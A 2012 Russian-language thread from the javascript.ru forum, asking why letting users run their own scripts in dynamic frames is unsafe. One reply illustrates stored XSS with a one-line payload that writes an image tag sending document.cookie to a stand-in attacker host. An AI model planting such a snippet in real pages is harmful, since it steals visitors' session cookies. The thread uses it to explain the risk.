Javascript-форум (https://javascript.ru/forum/)
-   Общие вопросы Javascript (https://javascript.ru/forum/misc/)
-   -   Безопасность и динамические фреймы (https://javascript.ru/forum/misc/25094-bezopasnost-i-dinamicheskie-frejjmy.html)

B@rmaley.e><e 25.01.2012 14:47

qwertyuiop10, потому что Ваш подход небезопасен.

qwertyuiop10 25.01.2012 17:15

B@rmaley.e><e,

Ну так я же спрашиваю: почему небезопасен? Поточнее пожалуйста.

Aetae 25.01.2012 17:20

Вам же сказали - если человек может воспользоваться этим только для себя - всё нормально.
Но если он может показать написанное другим, то нет.

Сам себе человек и так может что угодно запустить на вашей странице.
Если же он может дать другим посмотреть написанное, то нет ничег проще чем написать например:
document.write('<img src="http://l33thaxor.net/?'+encodeURIComponent(document.cookie)+'">')

qwertyuiop10 25.01.2012 20:01

Ну а на счет мини-подигона на xiper.net? Там юзер меняет только в своём браузере. И вообще, не видел ни одного полигона, реализованного без обращения к серверу, хотя везде пользователь меняет страницы в своём браузере.

Aetae 25.01.2012 21:49

Хз как оно там: может статьи пишутся юзерами,мож задел на будущее, who cares.


Часовой пояс GMT +3, время: 05:45.